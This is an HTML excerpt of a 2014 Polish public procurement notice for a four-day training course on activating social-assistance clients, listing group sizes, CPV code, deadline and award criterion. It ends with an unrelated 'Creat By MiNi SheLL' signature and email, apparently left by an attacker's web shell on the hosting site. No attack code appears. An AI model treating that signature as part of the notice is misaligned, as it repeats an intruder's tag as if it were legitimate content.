<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - Innowacyjne metody aktywizacji klientów pomocy społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu szkolenia pod nazwą Innowacyjne metody aktywizacji klientów pomocy społecznej.
2.	Czterodniowe szkolenie (32 godziny dydaktyczne), realizowane będzie w trybie wyjazdowym, dla każdej             z dwóch grup szkoleniowych liczących po ok. 20 osób każda.
3.	Zajęcia będą się odbywać w dni robocze.
4.	Zamawiający podaje minimalny zakres tematyczny szkolenia. Wykonawca odpowiedzialny jest za skonstruowanie, z uwzględnieniem podanych zagadnień, pełnego programu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com